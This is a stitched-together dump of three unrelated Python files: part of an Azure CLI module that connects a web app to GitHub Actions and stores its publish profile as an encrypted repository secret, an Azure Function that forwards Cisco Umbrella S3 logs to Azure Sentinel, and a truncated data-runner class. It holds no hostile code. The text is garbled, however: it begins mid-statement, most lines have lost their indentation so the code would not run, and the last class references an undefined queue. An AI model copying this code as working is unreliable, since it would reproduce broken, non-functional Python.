"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
            if java_container_split and len(java_container_split) > 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'dotnetcore':
        # No runtime version is detected for dotnetcore; an empty version string is passed on.
        app_runtime_version = ""
        return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
    # Encrypt a Unicode string using the repository public key (libsodium sealed box)
    from base64 import b64encode
    from nacl import encoding, public  # PyNaCl; assumed dependency for sealed-box encryption
    public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
    sealed_box = public.SealedBox(public_key)
    encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
    return b64encode(encrypted).decode("utf-8")
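# Illustrative usage sketch (variable names are placeholders; see _add_publish_profile_to_github
# above for the real call site):
#
#   repo_key = requests.get("https://api.github.com/repos/{}/actions/secrets/public-key".format(repo),
#                           headers=headers).json()
#   encrypted = _encrypt_github_actions_secret(public_key=repo_key['key'], secret_value=profile_xml)
#   # PUT `encrypted` together with repo_key['key_id'] to the secrets endpoint.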
|
__init__.py
|
import requests
import datetime
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
import re
TIME_INTERVAL_MINUTES = 10
DIVIDE_TO_MULTIPLE_TABLES = True
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = 'Cisco_Umbrella'
aws_s3_bucket = os.environ.get('S3Bucket')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
logAnalyticsUri = os.environ.get('logAnalyticsUri')
if logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace():
    logAnalyticsUri = 'https://' + sentinel_customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure\.([a-zA-Z\.]+)$'
match = re.match(pattern, str(logAnalyticsUri))
if not match:
    raise Exception("Cisco_Umbrella: Invalid Log Analytics Uri.")
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
cli = UmbrellaClient(aws_access_key_id, aws_secret_acces_key, aws_s3_bucket)
ts_from, ts_to = cli.get_time_interval()
logging.info('Searching files last modified from {} to {}'.format(ts_from, ts_to))
obj_list = cli.get_files_list(ts_from, ts_to)
logging.info('Total number of files is {}. Total size is {} MB'.format(
len(obj_list),
round(sum([x['Size'] for x in obj_list]) / 10**6, 2)
))
failed_sent_events_number = 0
successfull_sent_events_number = 0
if DIVIDE_TO_MULTIPLE_TABLES:
dns_files = []
proxy_files = []
ip_files = []
cdfw_files = []
for obj in obj_list:
key = obj.get('Key', '')
if 'dnslogs' in key.lower():
dns_files.append(obj)
elif 'proxylogs' in key.lower():
proxy_files.append(obj)
elif 'iplogs' in key.lower():
ip_files.append(obj)
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
cdfw_files.append(obj)
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_dns', queue_size=10000, bulks_number=10)
with sentinel:
for obj in dns_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_proxy', queue_size=10000, bulks_number=10)
with sentinel:
for obj in proxy_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_ip', queue_size=10000, bulks_number=10)
with sentinel:
for obj in ip_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_cloudfirewall', queue_size=10000, bulks_number=10)
with sentinel:
for obj in cdfw_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
else:
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
with sentinel:
for obj in obj_list:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
def convert_list_to_csv_line(ls):
line = StringIO()
writer = csv.writer(line)
writer.writerow(ls)
return line.getvalue()
class UmbrellaClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_s3_bucket):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_s3_bucket = self._get_s3_bucket_name(aws_s3_bucket)
self.aws_s3_prefix = self._get_s3_prefix(aws_s3_bucket)
self.total_events = 0
self.input_date_format = '%Y-%m-%d %H:%M:%S'
self.output_date_format = '%Y-%m-%dT%H:%M:%SZ'
self.s3 = boto3.client(
's3',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key
)
def _get_s3_bucket_name(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
aws_s3_bucket = tokens[0]
return aws_s3_bucket
def _get_s3_prefix(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
if len(tokens) > 1:
prefix = '/'.join(tokens[1:]) + '/'
else:
prefix = ''
return prefix
def _normalize_aws_s3_bucket_string(self, aws_s3_bucket):
aws_s3_bucket = aws_s3_bucket.strip()
aws_s3_bucket = aws_s3_bucket.replace('s3://', '')
if aws_s3_bucket.startswith('/'):
aws_s3_bucket = aws_s3_bucket[1:]
if aws_s3_bucket.endswith('/'):
aws_s3_bucket = aws_s3_bucket[:-1]
return aws_s3_bucket
def get_time_interval(self):
ts_from = datetime.datetime.utcnow() - datetime.timedelta(minutes=TIME_INTERVAL_MINUTES + 1)
ts_to = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
ts_from = ts_from.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
ts_to = ts_to.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
return ts_from, ts_to
def _make_objects_list_request(self, marker='', prefix=''):
response = self.s3.list_objects(
Bucket=self.aws_s3_bucket,
Marker=marker,
Prefix=prefix
)
try:
response_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
return response
else:
raise Exception('HTTP Response Code - {}'.format(response_code))
except Exception as err:
logging.error('Error while getting objects list - {}'.format(err))
raise Exception
def get_files_list(self, ts_from, ts_to):
files = []
folders = ['dnslogs', 'proxylogs', 'iplogs', 'cloudfirewalllogs', 'cdfwlogs']
if self.aws_s3_prefix:
folders = [self.aws_s3_prefix + folder for folder in folders]
marker_end = (ts_from - datetime.timedelta(minutes=60)).strftime("/%Y-%m-%d/%Y-%m-%d-%H-%M")
for folder in folders:
marker = folder + marker_end
while True:
response = self._make_objects_list_request(marker=marker, prefix=folder)
for file_obj in response.get('Contents', []):
if ts_to > file_obj['LastModified'] >= ts_from:
files.append(file_obj)
if response['IsTruncated'] is True:
marker = response['Contents'][-1]['Key']
else:
break
return self.sort_files_by_date(files)
def download_obj(self, key):
logging.info('Started downloading {}'.format(key))
res = self.s3.get_object(Bucket=self.aws_s3_bucket, Key=key)
try:
response_code = res.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
body = res['Body']
data = body.read()
logging.info('File {} downloaded'.format(key))
return data
else:
logging.error('Error while getting object {}. HTTP Response Code - {}'.format(key, response_code))
except Exception as err:
logging.error('Error while getting object {} - {}'.format(key, err))
def unpack_file(self, downloaded_obj, key):
try:
file_obj = io.BytesIO(downloaded_obj)
csv_file = gzip.GzipFile(fileobj=file_obj).read().decode()
return csv_file
except Exception as err:
logging.error('Error while unpacking file {} - {}'.format(key, err))
@staticmethod
def convert_empty_string_to_null_values(d: dict):
for k, v in d.items():
if v == '' or (isinstance(v, list) and len(v) == 1 and v[0] == ''):
d[k] = None
return d
@staticmethod
def format_date(date_string, input_format, output_format):
try:
date = datetime.datetime.strptime(date_string, input_format)
date_string = date.strftime(output_format)
except Exception:
pass
return date_string
def parse_csv_ip(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 7:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identity': row[1],
'Source IP': row[2],
'Source Port': row[3],
'Destination IP': row[4],
'Destination Port': row[5],
'Categories': row[6].split(',')
}
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'iplogs'
yield event
def parse_csv_proxy(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 21:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identities': row[1],
'Internal IP': row[2],
'External IP': row[3],
'Destination IP': row[4],
'Content Type': row[5],
'Verdict': row[6],
'URL': row[7],
'Referer': row[8],
'userAgent': row[9],
'statusCode': row[10],
'requestSize': row[11],
'responseSize': row[12],
'responseBodySize': row[13],
'SHA-SHA256': row[14],
'Categories': row[15].split(','),
'AVDetections': row[16].split(','),
'PUAs': row[17].split(','),
'AMP Disposition': row[18],
'AMP Malware Name': row[19],
'AMP Score': row[20]
}
try:
event['Blocked Categories'] = row[21].split(',')
except IndexError:
pass
int_fields = [
'requestSize',
'responseSize',
'responseBodySize'
]
for field in int_fields:
try:
event[field] = int(event[field])
except Exception:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'proxylogs'
yield event
def parse_csv_dns(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 10:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Policy Identity': row[1],
'Identities': row[2].split(','),
'InternalIp': row[3],
'ExternalIp': row[4],
'Action': row[5],
'QueryType': row[6],
'ResponseCode': row[7],
'Domain': row[8],
'Categories': row[9].split(',')
}
try:
event['Policy Identity Type'] = row[10]
except IndexError:
pass
try:
event['Identity Types'] = row[11].split(',')
except IndexError:
pass
try:
event['Blocked Categories'] = row[12].split(',')
except IndexError:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'dnslogs'
yield event
def parse_csv_cdfw(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 14:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'originId': row[1],
'Identity': row[2],
'Identity Type': row[3],
'Direction': row[4],
'ipProtocol': row[5],
'packetSize': row[6],
'sourceIp': row[7],
'sourcePort': row[8],
'destinationIp': row[9],
'destinationPort': row[10],
'dataCenter': row[11],
'ruleId': row[12],
'verdict': row[13]
}
else:
event = {"message": convert_list_to_csv_line(row)}
event['EventType'] = 'cloudfirewalllogs'
yield event
@staticmethod
def sort_files_by_date(ls):
return sorted(ls, key=lambda k: k['LastModified'])
def process_file(self, obj, dest):
t0 = time.time()
key = obj['Key']
if 'csv.gz' in key.lower():
downloaded_obj = self.download_obj(key)
csv_file = self.unpack_file(downloaded_obj, key)
parser_func = None
if 'dnslogs' in key.lower():
parser_func = self.parse_csv_dns
elif 'proxylogs' in key.lower():
parser_func = self.parse_csv_proxy
elif 'iplogs' in key.lower():
parser_func = self.parse_csv_ip
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
parser_func = self.parse_csv_cdfw
if parser_func:
file_events = 0
for event in parser_func(csv_file):
dest.send(event)
file_events += 1
self.total_events += 1
logging.info('File processed | TIME {} sec | SIZE {} MB | Events {} | Key {}'.format(round(time.time() - t0, 2), round(obj['Size'] / 10**6, 2), file_events, key))
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
    def __enter__(self):
        return self
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
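    # For reference, the canonical string signed above (Log Analytics Data Collector API,
    # SharedKey scheme) has the shape:
    #
    #   POST\n<content_length>\napplication/json\nx-ms-date:<rfc1123 date>\n/api/logs
    #
    # Its HMAC-SHA256, keyed with the base64-decoded workspace key and then base64-encoded,
    # is sent as "SharedKey <customer_id>:<signature>".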
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
        uri = logAnalyticsUri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
        response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info('{} events have been successfully sent to Azure Sentinel'.format(events_number))
self.successfull_sent_events_number += events_number
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
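# Illustrative usage sketch (CUSTOMER_ID / SHARED_KEY / events are placeholders):
#
#   connector = AzureSentinelConnector(CUSTOMER_ID, SHARED_KEY, 'Cisco_Umbrella_dns')
#   with connector:
#       for event in events:
#           connector.send(event)
#   print(connector.successfull_sent_events_number, connector.failed_sent_events_number)
#
# Events are buffered in lists of `queue_size` and posted from worker threads once
# `bulks_number` lists have accumulated; exiting the context manager flushes the rest.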
|
data_runner.py
|
import multiprocessing
class DataRunnerMP:
"""
A multi-processing data runner for tensorflow
"""
def __init__(self, task_func, task_generator, capacity=100):
self._task_func = task_func
self._task_generator = task_generator
self.counter = 0
self.processes = []
self.capacity = capacity
def get_feed_blobs(self):
if self.counter % 100 == 0:
print('qlen=%i' % self.data_queue.qsize())
self.counter += 1
blobs = self.data_queue.get()
return blobs
